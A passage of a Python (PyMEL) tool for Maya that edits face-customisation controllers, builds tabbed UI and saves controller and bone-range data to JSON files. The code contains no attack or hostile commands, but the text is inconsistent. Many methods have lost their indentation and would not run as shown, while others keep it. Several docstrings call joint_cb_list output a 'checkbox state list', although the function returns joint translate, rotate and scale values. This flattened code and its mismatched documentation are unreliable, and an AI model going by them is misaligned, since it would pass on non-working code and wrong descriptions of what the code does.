                (save_data_btn, 'right', 10),
                (save_data_btn, 'bottom', 10)
            ],
            attachControl=[
                (add_controller_detail_btn, 'left', 5, add_controller_btn),
                ("controllerListLayout", 'top', 10, add_controller_btn),
                ("controllerListLayout", 'bottom', 10, save_data_btn),
            ])
        pm.setParent("..")
        # --- tab 2: affected bones ---
        controller_detail_list_layout = pm.scrollLayout(
            "controllerDetailListLayout", height=400)
        pm.setParent("..")
        # --- tab 3: test controllers ---
        controller_test_list_layout = pm.formLayout()
        create_test_controller_btn = pm.button(
            label=u"创建测试控制器",
            c=lambda *args: self.create_editor_test_controller())
        test_scroll = pm.scrollLayout(
            "controllerTestListLayout", height=400)
        pm.setParent("..")
        pm.formLayout(
            controller_test_list_layout, edit=True,
            attachForm=[
                (create_test_controller_btn, 'top', 10),
                (create_test_controller_btn, 'left', 10),
                (create_test_controller_btn, 'right', 10),
                (test_scroll, "left", 10),
                (test_scroll, "right", 10),
            ],
            attachControl=[
                (test_scroll, 'top', 5, create_test_controller_btn),
            ])
        pm.setParent("..")
        pm.tabLayout(
            tab_layout,
            edit=True,
            tabLabel=(
                (controller_list_layout, u'控制器'),
                (controller_detail_list_layout, u'影响骨骼'),
                (controller_test_list_layout, u'测试')
            ))
        pm.setParent("..")
        pm.formLayout(
            layout, edit=True,
            attachForm=[
                (option_menu, 'top', 10),
                (option_menu, 'left', 10),
                (add_module_btn, 'right', 10),
                (add_module_btn, 'top', 7),
                (tab_layout, 'left', 10),
                (tab_layout, 'right', 10),
                (tab_layout, 'bottom', 10),
            ],
            attachControl=[
                (option_menu, 'right', 5, add_module_btn),
                (tab_layout, 'top', 5, option_menu),
            ])
        pm.setParent("..")
        return layout
def create_editor_test_controller(self):
selected_module = pm.optionMenuGrp(
"faceModuleOptionsWidget", q=True, value=True)
controller_file = "%s/%s/%sController.json" % (
self.json_folder, selected_module, selected_module)
control_group_file = "%s/%s/%sControlGroup.json" % (
self.json_folder, selected_module, selected_module)
dict_data = common.read_json(file_path=controller_file)
detail_data = common.read_json(file_path=control_group_file)
for controller in dict_data["%sController" % selected_module]:
self.editor_test_controller(
controller,
detail_data[controller["controllerName"]])
return
def editor_test_controller(self, controller={}, detail_data={}):
test_controller = test_node.TestEditorController()
test_controller.get_controller_from_data(controller, detail_data)
test_controller.create_locator_controller()
return test_controller
def add_slider_for_selected(self):
# print(pm.textScrollList("ARIDScrollList", q=True, si=True)[0])
selected_key = pm.textScrollList("ARIDScrollList", q=True, si=True)[0]
# print(self.ar_data[selected_key])
if not pm.objExists(selected_key):
self.create_slider_controller(name=selected_key)
return
def create_slider_controller(self, name):
locator = zero_locator(name=name)
pm.addAttr(locator, ln="sliderX", at="double", min=0, max=1, dv=0)
pm.setAttr("%s.sliderX" % locator, e=True, k=True)
return
def initialize(self):
if pm.optionVar(q='jsonManagerFolder'):
self.json_folder = pm.optionVar(q='jsonManagerFolder')
pm.textFieldButtonGrp("XDFaceEditDataStoreField", e=True, text=self.json_folder)
self.init_module_data()
# if pm.optionVar(q='jsonManagerMainTabLayoutIndex'):
# self.current_tab_index = int(pm.optionVar(
# q='jsonManagerMainTabLayoutIndex'))
# if pm.optionVar(q='jsonManagerDiscardBrowFilePath'):
# self.brow_file_folder = pm.optionVar(
# q='jsonManagerDiscardBrowFilePath')
# if pm.optionVar(q='jsonManagerDiscardEyeFilePath'):
# self.eye_file_folder = pm.optionVar(
# q='jsonManagerDiscardEyeFilePath')
# if pm.optionVar(q='jsonManagerDiscardNoseFilePath'):
# self.nose_file_folder = pm.optionVar(
# q='jsonManagerDiscardNoseFilePath')
# if pm.optionVar(q='jsonManagerDiscardMouthFilePath'):
# self.mouth_file_folder = pm.optionVar(
# q='jsonManagerDiscardMouthFilePath')
# if pm.optionVar(q='jsonManagerDiscardFaceFilePath'):
# self.face_file_folder = pm.optionVar(
# q='jsonManagerDiscardFaceFilePath')
def init_module_data(self):
self.module_sections = self.scanning_folder("folders")
for module_section in self.module_sections:
module = FeatureManager(module_section)
module.json_location(os.path.join(self.json_folder, module_section))
layout = module.custom_widget(parent=self.main_tab)
pm.tabLayout(self.main_tab, edit=True, tabLabel=((layout, module_section)))
# for rig_classic_components
def _closed_window_cmd(self):
pm.optionVar(sv=('jsonManagerFolder', self.json_folder))
# pm.optionVar(sv=('arFileLocation', self.ar_file_location))
# self.current_tab_index = pm.tabLayout(self.main_tab, q=True, sti=True)
# pm.optionVar(
# sv=('jsonManagerMainTabLayoutIndex', self.current_tab_index))
# pm.optionVar(
# sv=('jsonManagerDiscardBrowFilePath', self.brow_file_folder))
# pm.optionVar(
# sv=('jsonManagerDiscardEyeFilePath', self.eye_file_folder))
# pm.optionVar(
# sv=('jsonManagerDiscardNoseFilePath', self.nose_file_folder))
# pm.optionVar(
# sv=('jsonManagerDiscardMouthFilePath', self.mouth_file_folder))
# pm.optionVar(
# sv=('jsonManagerDiscardFaceFilePath', self.face_file_folder))
def setting_json_folder(self):
json_folder = pm.fileDialog2(
dialogStyle=2, fileFilter="JSON File (*.json);;", fileMode=3, okc=u"选择文件夹")
if json_folder[0]:
self.json_folder = json_folder[0]
self.module_sections = self.scanning_folder("folders")
pm.textFieldButtonGrp("XDFaceEditDataStoreField",
e=True, text=json_folder[0])
return
def scanning_folder(self, return_type):
u"""扫描文件夹,将目录列取出来,如果目录下有对应的文件(例:文件夹名face, 对应的文件)
:param return_type: 返回类型
"""
json_list = []
json_file = ""
folder_list = []
if self.json_folder != '':
path_dir = os.listdir(self.json_folder)
for json_file in path_dir:
if json_file == ".mayaSwatches":
continue
full_path = "%s/%s" % (self.json_folder, json_file)
if os.path.isdir(full_path):
# print("%s it's a directory" % full_path)
folder_list.append(json_file)
elif os.path.isfile(full_path):
# print("%s it's a normal file" % full_path)
# 获取JSON文件的名字后,清理文件的后缀名
file_name = os.path.splitext(json_file)[0]
json_list.append(file_name)
if return_type == "files":
return json_file
elif return_type == "folders":
return folder_list
def command_new_module(self):
if self.new_module():
self.init_module_data()
def new_module(self):
u"""创建新的特征模块
:return:
"""
data_root = self.json_folder
module_name = pm.textFieldButtonGrp(
"XDFaceEditNewModuleField", q=True, text=True)
if not module_name == "":
module_path = os.path.join(data_root, module_name)
# print(module_path)
if not os.path.exists(module_path):
os.makedirs(module_path)
if self.new_module_data_file(module_name, module_path):
pm.textFieldButtonGrp(
"XDFaceEditNewModuleField", e=True, text="")
else:
pm.error(u"{}模块创建过程错误,目录下已经存在同名模块".format(module_name))
else:
pm.error(u"模块的名字不能缺")
return True
def new_module_data_file(self, module_name, module_path):
module_control_group_file = "{}ControlGroup.json".format(module_name)
module_control_group_file_path = os.path.join(
module_path, module_control_group_file)
module_control_group_data = {}
print(module_control_group_file_path)
common.write_json(module_control_group_data,
file_path=module_control_group_file_path)
module_control_file = "{}Controller.json".format(module_name)
module_control_file_path = os.path.join(
module_path, module_control_file)
module_control_data = {}
module_control_data["{}Controller".format(module_name)] = []
print(module_control_file_path)
common.write_json(module_control_data,
file_path=module_control_file_path)
return True
def option_menu_widget(self, parent_widget):
if pm.optionMenuGrp("faceModuleOptionsWidget", ex=True):
pm.deleteUI("faceModuleOptionsWidget")
widget = pm.optionMenuGrp(
"faceModuleOptionsWidget",
parent=parent_widget,
label=u"模块名称",
cw2=[50, 50],
adj=2,
cc=lambda *args: self.selected_controller(pm.optionMenuGrp(widget, q=True, value=True)))
if len(self.module_sections) > 0:
for json_file in self.module_sections:
pm.menuItem(label=json_file)
return widget
    def selected_controller(self, module):
        u"""Reload the controller widgets for the chosen *module*.

        Clears both the controller and the detail scroll layouts, then reads
        ``<module>Controller.json`` and rebuilds one widget row per
        controller entry.

        :param module: module (folder) name selected in the option menu.
        """
        selected_controller = pm.optionMenuGrp(
            "faceModuleOptionsWidget", q=True, value=True)
        # print("selected controller: %s" % selected_controller)
        controller_file = "%s/%s/%sController.json" % (
            self.json_folder, module, module)
        # print(controller_file)
        controller_list = pm.scrollLayout(
            "controllerListLayout", q=True, ca=True)
        detail_list = pm.scrollLayout(
            "controllerDetailListLayout", q=True, ca=True)
        # Remove previously built rows before repopulating.
        if controller_list is not None:
            # print controller_list
            for child in controller_list:
                pm.deleteUI(child)
        if detail_list is not None:
            for child in detail_list:
                pm.deleteUI(child)
        dict_data = None
        with open(controller_file, 'r') as data:
            dict_data = json.load(data)
        # print(dict_data)
        controller_key = "%sController" % module
        # One widget row per controller entry, filled from the json data.
        for index in range(0, len(dict_data[controller_key])):
            self.add_controller_widget(
                index=index, parent="controllerListLayout")
            pm.textFieldButtonGrp(
                "controllerNameWidget%s" % index, e=True,
                text=dict_data[controller_key][index]["controllerName"])
            pm.textFieldButtonGrp(
                "controllerGrpNameWidget%s" % index, e=True,
                text=dict_data[controller_key][index]["ControllerGroupName"])
            pm.textFieldButtonGrp(
                "controllerBoneNameWidget%s" % index, e=True,
                text=dict_data[controller_key][index]["ControllerBoneName"])
            offset_value = dict_data[
                controller_key][index]["ControllerPositionOffset"]
            pm.floatFieldGrp(
                "controllerBoneOffsetWidget%s" % index,
                e=True,
                value1=offset_value[0],
                value2=offset_value[1],
                value3=offset_value[2])
            pm.textFieldGrp(
                "controller%sAxisX" % index, e=True,
                text=dict_data[controller_key][index]["AxisControl"]["XAxis"])
            pm.textFieldGrp(
                "controller%sAxisY" % index, e=True,
                text=dict_data[controller_key][index]["AxisControl"]["YAxis"])
            pm.textFieldGrp(
                "controller%sAxisZ" % index, e=True,
                text=dict_data[controller_key][index]["AxisControl"]["ZAxis"])
def add_module(self):
u"""
添加模块
模块实际上是一个文件夹。
每当新建一个模块,程序会在文件夹下面创建两个JSON文件。分别为控制器文件和控制器的细节信息文件。
例如:
模块名 Face
控制器文件 FaceController.json
细节文件 FaceControlGroup.json
:return: True
"""
# 文件模式
file_path = pm.fileDialog2(
dialogStyle=2,
fileFilter="JSON File (*.json);;",
fileMode=3,
okc=u"设置模块路径")
folder_name = file_path[0].split("/")[len(file_path[0].split("/")) - 1]
# 将新添加的模块添加到菜单项
pm.menuItem(label=folder_name, parent="faceModuleOptionsWidget|OptionMenu")
controller_path = "%s/%sController.json" % (file_path[0], folder_name)
dict_data = {}
controller_key = "%sController" % folder_name
dict_data[controller_key] = []
common.write_json(dict_data=dict_data, file_path=controller_path)
control_group_path = "%s/%sControlGroup.json" % (file_path[0], folder_name)
common.write_json(dict_data={}, file_path=control_group_path)
# 将菜单栏的当前选择修改为新添加的模块
pm.optionMenuGrp("faceModuleOptionsWidget", e=True, value=folder_name)
return True
def add_controller(self):
controller_index = pm.scrollLayout("controllerListLayout", q=True, nch=True)
self.controller[controller_index] = ("controllerGrp%s" % controller_index)
self.add_controller_widget(index=controller_index, parent="controllerListLayout")
    def add_controller_widget(self, index=0, parent=""):
        u"""Build (or rebuild) the widget row for controller *index*.

        An existing row with the same index is deleted first, so the method
        is safe to call when repopulating the list.

        :param index: row index used to derive unique widget names.
        :param parent: name of the layout the row is parented to.
        :return: the row's columnLayout.
        """
        if pm.columnLayout("controllerListItemLayout%s" % index, q=True, ex=True):
            pm.deleteUI("controllerListItemLayout%s" % index)
        layout = pm.columnLayout("controllerListItemLayout%s" % index, adj=1, parent=parent)
        pm.textFieldButtonGrp("controllerNameWidget%s" % index,
                              label=u"控制器名", cw3=[60, 200, 140], bl=u"指定",
                              bc=lambda *args: self.get_custom_controller(index))
        pm.textFieldButtonGrp("controllerGrpNameWidget%s" % index,
                              label=u"控制器组", cw3=[60, 200, 140], bl=u"指定")
        pm.textFieldButtonGrp(
            "controllerBoneNameWidget%s" % index, label=u"挂点名称", cw3=[60, 200, 140], bl=u"指定",
            bc=lambda *args: self.get_sample_node(text_widget="controllerBoneNameWidget%s" % index))
        pm.floatFieldGrp("controllerBoneOffsetWidget%s" % index,
                         numberOfFields=3, pre=3, label=u'挂点偏移', cw4=[60, 50, 50, 50])
        pm.textFieldGrp("controller%sAxisX" % index, label=u"XAxis", cw2=[60, 200])
        pm.textFieldGrp("controller%sAxisY" % index, label=u"YAxis", cw2=[60, 200])
        pm.textFieldGrp("controller%sAxisZ" % index, label=u"ZAxis", cw2=[60, 200])
        pm.separator(style='in', height=20)
        pm.setParent("..")  # end of layout
        return layout
    def add_control_detail_widget(self):
        u"""Build one detail frame per controller row and pre-fill it.

        For each row of the controller list, creates a frame with control
        type / group fields plus one bone scroll list per slider axis, then
        copies the names over from the controller tab and loads the
        definition joints from the controller node's jointsX/Y/Z attributes.
        """
        parent = "controllerDetailListLayout"
        for index in range(0, pm.scrollLayout("controllerListLayout", q=True, nch=True)):
            if pm.frameLayout("controllerDetailListItemLayout%s" % index, q=True, ex=True):
                pm.deleteUI("controllerDetailListItemLayout%s" % index)
            pm.frameLayout("controllerDetailListItemLayout%s" % index,
                           bgs=True, mw=10, mh=5, cll=True, cl=False, parent=parent)
            pm.textFieldButtonGrp("controllerDetailControlType%s" % index,
                                  label=u"控制类型", bl=u"指定", cw3=[48, 200, 140])
            pm.textFieldButtonGrp("controllerDetailControlGroup%s" % index,
                                  label=u"控制器组", bl=u"指定", cw3=[48, 200, 140])
            pm.text(label=u"滑竿控制", al="left", width=100)
            pm.text(label="SliderX:", al="left")
            pm.textScrollList("controllerDetailSliderXBone%s" % index)
            pm.text(label="SliderY:", al="left")
            pm.textScrollList("controllerDetailSliderYBone%s" % index)
            pm.text(label="SliderZ:", al="left")
            pm.textScrollList("controllerDetailSliderZBone%s" % index)
            pm.setParent("..")
            # Auto-fill fields from the matching controller-tab widgets.
            frame_label = pm.textFieldButtonGrp("controllerNameWidget%s" % index, q=True, text=True)
            pm.frameLayout("controllerDetailListItemLayout%s" % index, e=True, label=frame_label)
            control_type = pm.optionMenuGrp("faceModuleOptionsWidget", q=True, value=True)
            pm.textFieldButtonGrp("controllerDetailControlType%s" % index, e=True, text=control_type)
            control_grp = pm.textFieldButtonGrp("controllerGrpNameWidget%s" % index, q=True, text=True)
            pm.textFieldButtonGrp("controllerDetailControlGroup%s" % index, e=True, text=control_grp)
            control_name = pm.textFieldButtonGrp("controllerNameWidget%s" % index, q=True, text=True)
            # For each enabled axis, read the controller node's definition
            # joints and populate the matching scroll list.
            axis_x = pm.textFieldGrp("controller%sAxisX" % index, q=True, text=True)
            if axis_x != "" and axis_x is not None:
                definition_joints = pm.PyNode(control_name).attr("jointsX").get()
                pm.textScrollList("controllerDetailSliderXBone%s" % index, e=True, a=str_to_list(definition_joints))
            axis_y = pm.textFieldGrp("controller%sAxisY" % index, q=True, text=True)
            if axis_y != "" and axis_y is not None:
                definition_joints = pm.PyNode(control_name).attr("jointsY").get()
                pm.textScrollList("controllerDetailSliderYBone%s" % index, e=True, a=str_to_list(definition_joints))
            axis_z = pm.textFieldGrp("controller%sAxisZ" % index, q=True, text=True)
            if axis_z != "" and axis_z is not None:
                definition_joints = pm.PyNode(control_name).attr("jointsZ").get()
                pm.textScrollList("controllerDetailSliderZBone%s" % index, e=True, a=str_to_list(definition_joints))
        return
def get_sample_node(self, text_widget):
"""
获取样本节点
:param text_widget: 保存样本节点的文本输入框的名字
:return: 样本节点的名字(字符串)
"""
source_sample = pm.ls(sl=True)[0]
pm.textFieldButtonGrp(text_widget, e=True, text=source_sample)
return source_sample
def get_custom_controller(self, index):
custom_controller = self.get_sample_node(
text_widget="controllerNameWidget%s" % index)
# print custom_controller
if "sliderX" in pm.listAttr(custom_controller, k=True):
pm.textFieldButtonGrp("")
pm.textFieldGrp(
"controller%sAxisX" % index, e=True, text="sliderX")
if "sliderY" in pm.listAttr(custom_controller, k=True):
pm.textFieldGrp(
"controller%sAxisY" % index, e=True, text="sliderY")
if "sliderZ" in pm.listAttr(custom_controller, k=True):
pm.textFieldGrp(
"controller%sAxisZ" % index, e=True, text="sliderZ")
return
def generate_custom_data(self):
dict_data = {}
self.dict_data = list()
for index in range(0, pm.scrollLayout(
"controllerListLayout", q=True, nch=True)):
dict_data = {}
axis_control = {}
dict_data["controllerName"] = pm.textFieldButtonGrp(
"controllerNameWidget%s" % index, q=True, text=True)
dict_data["ControllerGroupName"] = pm.textFieldButtonGrp(
"controllerGrpNameWidget%s" % index, q=True, text=True)
dict_data["ControllerBoneName"] = pm.textFieldButtonGrp(
"controllerBoneNameWidget%s" % index, q=True, text=True)
dict_data["ControllerPositionOffset"] = pm.floatFieldGrp(
"controllerBoneOffsetWidget%s" % index, q=True, value=True)
axis_control["XAxis"] = pm.textFieldGrp(
"controller%sAxisX" % index, q=True, text=True)
axis_control["YAxis"] = pm.textFieldGrp(
"controller%sAxisY" % index, q=True, text=True)
axis_control["ZAxis"] = pm.textFieldGrp(
"controller%sAxisZ" % index, q=True, text=True)
dict_data["AxisControl"] = axis_control
self.dict_data.append(dict_data)
def joint_cb_list(self, jnt, pre=5):
"""
骨骼在通道里面的值
列取骨骼在通道栏里面的属性及当前的值,数值小数点后保留5位,
其中位移属性的值需要缩小100倍,也就是乘以0.01,
这是为了解决FBX文件在MAYA,U3D这两个软件内比例单位的差异化造成的错误
:param jnt: 目标骨骼的名称
:param pre: 小数点后面保留几位
:return
"""
jnt_value = [
round(pm.PyNode(jnt).translateX.get() * 0.01, pre),
round(pm.PyNode(jnt).translateY.get() * 0.01, pre),
round(pm.PyNode(jnt).translateZ.get() * 0.01, pre),
round(pm.PyNode(jnt).rotateX.get(), pre),
round(pm.PyNode(jnt).rotateY.get(), pre),
round(pm.PyNode(jnt).rotateZ.get(), pre),
round(pm.PyNode(jnt).scaleX.get(), pre),
round(pm.PyNode(jnt).scaleY.get(), pre),
round(pm.PyNode(jnt).scaleZ.get(), pre),
]
return jnt_value
def generate_custom_detail_data(self):
"""
生成自定义捏脸的细节数据
细节包括各个空间包含的骨骼的位移信息
:return:
"""
dict_data = {}
self.detail_data = {}
# print("Detail item : %s" % pm.scrollLayout(
# "controllerDetailListLayout", q=True, nch=True))
for index in range(0, pm.scrollLayout("controllerDetailListLayout", q=True, nch=True)):
# dict_data = {}
key_name = pm.frameLayout("controllerDetailListItemLayout%s" % index,
q=True, label=True)
dict_data[key_name] = {}
dict_data[key_name]["shapeType"] = pm.optionMenuGrp(
"faceModuleOptionsWidget", q=True, value=True)
dict_data[key_name]["GroupName"] = pm.textFieldButtonGrp(
"controllerDetailControlGroup%s" % index, q=True, text=True)
dict_data[key_name]["ControlGroup"] = []
axis_x = dict()
axis_x["GroupName"] = "%s_X" % key_name
axis_x["BoneRange"] = []
for jnt in pm.textScrollList("controllerDetailSliderXBone%s" % index, q=True, ai=True):
jnt_dict = dict()
jnt_dict["BoneName"] = jnt
jnt_dict["Max"] = []
if jnt:
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderX"), 1)
jnt_dict["Max"] = self.joint_cb_list(jnt)
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderX"), 0)
jnt_dict["Min"] = []
if jnt:
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderX"), -1)
jnt_dict["Min"] = self.joint_cb_list(jnt)
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderX"), 0)
axis_x["BoneRange"].append(jnt_dict)
dict_data[key_name]["ControlGroup"].append(axis_x)
axis_y = dict()
axis_y["GroupName"] = "%s_Y" % key_name
axis_y["BoneRange"] = []
for jnt in pm.textScrollList("controllerDetailSliderYBone%s" % index, q=True, ai=True):
jnt_dict = dict()
jnt_dict["BoneName"] = jnt
jnt_dict["Max"] = []
jnt_dict["Min"] = []
if jnt:
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderY"), 1)
jnt_dict["Max"] = self.joint_cb_list(jnt)
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderY"), 0)
jnt_dict["Min"] = []
if jnt:
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderY"), -1)
jnt_dict["Min"] = self.joint_cb_list(jnt)
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderY"), 0)
axis_y["BoneRange"].append(jnt_dict)
dict_data[key_name]["ControlGroup"].append(axis_y)
axis_z = dict()
axis_z["GroupName"] = "%s_Z" % key_name
axis_z["BoneRange"] = []
for jnt in pm.textScrollList("controllerDetailSliderZBone%s" % index, q=True, ai=True):
jnt_dict = dict()
jnt_dict["BoneName"] = jnt
jnt_dict["Max"] = []
jnt_dict["Min"] = []
if jnt:
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderZ"), 1)
jnt_dict["Max"] = self.joint_cb_list(jnt)
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderZ"), 0)
jnt_dict["Min"] = []
if jnt:
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderZ"), -1)
jnt_dict["Min"] = self.joint_cb_list(jnt)
pm.setAttr(pm.PyNode(pm.textFieldButtonGrp("controllerNameWidget%s" % index,
q=True, text=True)).attr("sliderZ"), 0)
axis_z["BoneRange"].append(jnt_dict)
dict_data[key_name]["ControlGroup"].append(axis_z)
self.detail_data = dict_data
return
def save_custom_data(self):
"""
保存自定义捏脸数据
:return: None
"""
menu_item_selected = pm.optionMenuGrp(
"faceModuleOptionsWidget", q=True, value=True)
self.generate_custom_data()
control_file_path = "%s/%s/%sController.json" % (
self.json_folder, menu_item_selected, menu_item_selected)
controller_data = dict()
controller_data["%sController" % menu_item_selected] = self.dict_data
with open(control_file_path, "w") as f:
json.dump(controller_data, f, indent=4)
self.generate_custom_detail_data()
detail_file_path = "%s/%s/%sControlGroup.json" % (
self.json_folder, menu_item_selected, menu_item_selected)
with open(detail_file_path, "w") as f:
json.dump(self.detail_data, f, indent=4)
print(u"保存成功")
return
def widget_discard_slider(self, ID_name="ID1", ID_num=12):
for ID_index in range(1, ID_num + 1):
pm.floatSliderGrp(
"slider_%s_%s" % (ID_name, ID_index),
label=u"%s.%s" % (ID_name, ID_index),
field=True,
minValue=0,
maxValue=1.0,
fieldMinValue=0,
fieldMaxValue=1.0,
pre=3,
adj=3,
value=0,
cw3=[60, 60, 100])
pm.connectControl(
"slider_%s_%s" % (ID_name, ID_index),
'%s_%s.sliderX' % (ID_name, ID_index))
return
    def child_brow_tab(self):
        u"""Build the brow tab: ID5 sliders plus a storage-path field.

        :return: the tab's columnLayout.
        """
        layout = pm.columnLayout(adj=1, rs=5)
        pm.rowColumnLayout(numberOfColumns=2)
        self.widget_discard_slider(ID_name="ID5", ID_num=12)
        pm.setParent('..')
        self.brow_discard_path_field = pm.textFieldButtonGrp(
            label=u"存放路径",
            bl=u"指定路径",
            adj=2,
            text=self.brow_file_folder,
            cw3=[60, 200, 100],
            bc=lambda *args: self.setting_brow_file_folder())
        pm.setParent('..')
        return layout
def setting_brow_file_folder(self):
json_folder = pm.fileDialog2(
dialogStyle=2,
fileFilter="JSON File (*.json);;",
fileMode=3, okc=u"选择文件夹")
if json_folder:
pm.textFieldButtonGrp(
self.brow_discard_path_field,
e=True,
text=json_folder[0])
self.brow_file_folder = json_folder[0]
return
    def child_eye_tab(self):
        u"""Build the eye tab: ID1 sliders plus a storage-path field.

        :return: the tab's columnLayout.
        """
        layout = pm.columnLayout(adj=1)
        pm.rowColumnLayout(numberOfColumns=2)
        self.widget_discard_slider(ID_name="ID1", ID_num=16)
        pm.setParent('..')
        self.eye_discard_path_field = pm.textFieldButtonGrp(
            label=u"存放路径",
            bl=u"创建Json文件",
            adj=2,
            text=self.eye_file_folder,
            cw3=[60, 200, 100],
            bc=lambda *args: self.setting_eye_file_folder())
        pm.setParent('..')
        return layout
def setting_eye_file_folder(self):
json_folder = pm.fileDialog2(
dialogStyle=2,
fileFilter="JSON File (*.json);;",
fileMode=3, okc=u"选择文件夹")
if json_folder:
pm.textFieldButtonGrp(
self.eye_discard_path_field,
e=True,
text=json_folder[0])
self.eye_file_folder = json_folder[0]
return
    def child_nose_tab(self):
        u"""Build the nose tab: ID2 sliders plus a storage-path field.

        :return: the tab's columnLayout.
        """
        layout = pm.columnLayout(adj=1)
        pm.rowColumnLayout(numberOfColumns=2)
        self.widget_discard_slider(ID_name="ID2", ID_num=14)
        pm.setParent('..')
        self.nose_discard_path_field = pm.textFieldButtonGrp(
            label=u"存放路径",
            bl=u"创建Json文件",
            adj=2,
            text=self.nose_file_folder,
            cw3=[60, 200, 100],
            bc=lambda *args: self.setting_nose_file_folder())
        pm.setParent('..')
        return layout
def setting_nose_file_folder(self):
    """Prompt for a folder and remember it as the nose JSON output folder."""
    picked = pm.fileDialog2(
        fileMode=3,
        dialogStyle=2,
        fileFilter="JSON File (*.json);;",
        okc=u"选择文件夹")
    if not picked:  # dialog cancelled
        return
    folder = picked[0]
    pm.textFieldButtonGrp(self.nose_discard_path_field, e=True, text=folder)
    self.nose_file_folder = folder
    return
def child_mouth_tab(self):
    """Build the mouth tab: the ID3 discard sliders plus a JSON-folder picker."""
    tab_root = pm.columnLayout(adj=1)
    pm.rowColumnLayout(numberOfColumns=2)
    self.widget_discard_slider(ID_name="ID3", ID_num=18)
    pm.setParent('..')
    # Field + button pair used to choose where mouth JSON files are stored.
    self.mouth_discard_path_field = pm.textFieldButtonGrp(
        adj=2,
        label=u"存放路径",
        bl=u"创建Json文件",
        text=self.mouth_file_folder,
        cw3=[60, 200, 100],
        bc=lambda *_: self.setting_mouth_file_folder())
    pm.setParent('..')
    return tab_root
def setting_mouth_file_folder(self):
    """Prompt for a folder and remember it as the mouth JSON output folder."""
    picked = pm.fileDialog2(
        fileMode=3,
        dialogStyle=2,
        fileFilter="JSON File (*.json);;",
        okc=u"选择文件夹")
    if not picked:  # dialog cancelled
        return
    folder = picked[0]
    pm.textFieldButtonGrp(self.mouth_discard_path_field, e=True, text=folder)
    self.mouth_file_folder = folder
    return
def child_face_tab(self):
    """Build the face tab: the ID4 discard sliders plus a JSON-folder picker."""
    tab_root = pm.columnLayout(adj=1)
    pm.rowColumnLayout(numberOfColumns=2)
    self.widget_discard_slider(ID_name="ID4", ID_num=14)
    pm.setParent('..')
    # Field + button pair used to choose where face JSON files are stored.
    self.face_discard_path_field = pm.textFieldButtonGrp(
        adj=2,
        label=u"存放路径",
        bl=u"创建Json文件",
        text=self.face_file_folder,
        cw3=[60, 200, 100],
        bc=lambda *_: self.setting_face_file_folder())
    pm.setParent('..')
    return tab_root
def setting_face_file_folder(self):
    """Prompt for a folder and remember it as the face JSON output folder."""
    picked = pm.fileDialog2(
        fileMode=3,
        dialogStyle=2,
        fileFilter="JSON File (*.json);;",
        okc=u"选择文件夹")
    if not picked:  # dialog cancelled
        return
    folder = picked[0]
    pm.textFieldButtonGrp(self.face_discard_path_field, e=True, text=folder)
    self.face_file_folder = folder
    return
def save_brow_data_to_json(self):
    """Write the brow channel data to <brow_file_folder>/<module_id>.json.

    The payload holds the module 'ID' plus a 'BoneRange' map of
    joint name -> checkbox state list (from joint_cb_list).
    """
    brow_joints = [
        "definition_M_brow",
        "definition_L_brow_1",
        "definition_L_brow_2",
        "definition_L_brow_3",
        "definition_L_brow_4",
        "definition_L_brow_5",
        "definition_R_brow_1",
        "definition_R_brow_2",
        "definition_R_brow_3",
        "definition_R_brow_4",
        "definition_R_brow_5",
    ]
    module_id = pm.intFieldGrp(
        self.module_id_field, q=True, value=True)[0]
    payload = {
        'ID': module_id,
        'BoneRange': {jnt: self.joint_cb_list(jnt=jnt) for jnt in brow_joints},
    }
    json_path = "%s/%s.json" % (self.brow_file_folder, module_id)
    with open(json_path, "w") as handle:
        json.dump(payload, handle, indent=2)
    print(u"Brow通道:%s 数据保存成功!" % module_id)
    return
def save_eye_data_to_json(self):
    """Write the eye channel data to <eye_file_folder>/<module_id>.json.

    The payload holds the module 'ID' plus a 'BoneRange' map of
    joint name -> checkbox state list (from joint_cb_list).
    """
    eye_joints = [
        "L_eyeBall_socket",
        "R_eyeBall_socket",
        "definition_facial_L_TLidInn",
        "definition_facial_L_TLidMid",
        "definition_facial_L_TLidOut",
        "definition_facial_L_BLidInn",
        "definition_facial_L_BLidMid",
        "definition_facial_L_BLidOut",
        "definition_facial_R_TLidOut",
        "definition_facial_R_TLidMid",
        "definition_facial_R_TLidInn",
        'definition_facial_R_BLidInn',
        "definition_facial_R_BLidMid",
        "definition_facial_R_BLidOut",
    ]
    module_id = pm.intFieldGrp(
        self.module_id_field, q=True, value=True)[0]
    payload = {
        'ID': module_id,
        'BoneRange': {jnt: self.joint_cb_list(jnt=jnt) for jnt in eye_joints},
    }
    json_path = "%s/%s.json" % (self.eye_file_folder, module_id)
    with open(json_path, "w") as handle:
        json.dump(payload, handle, indent=2)
    print(u"Eye通道:%s 数据保存成功!" % module_id)
    return
def save_nose_data_to_json(self):
    """Write the nose channel data to <nose_file_folder>/<module_id>.json.

    The payload holds the module 'ID' plus a 'BoneRange' map of
    joint name -> checkbox state list (from joint_cb_list).
    """
    nose_joints = [
        "L_eyeBall_socket",
        "R_eyeBall_socket",
        "definition_facial_C_NoseTip",
        "definition_facial_R_Nostril",
        "definition_facial_L_Nostril",
        "definition_facial_R_NoseBase",
        "definition_facial_L_NoseBase",
        "facial_C_Nose_JNT",
        "definition_facial_C_NoseBridge",
    ]
    module_id = pm.intFieldGrp(
        self.module_id_field, q=True, value=True)[0]
    payload = {
        'ID': module_id,
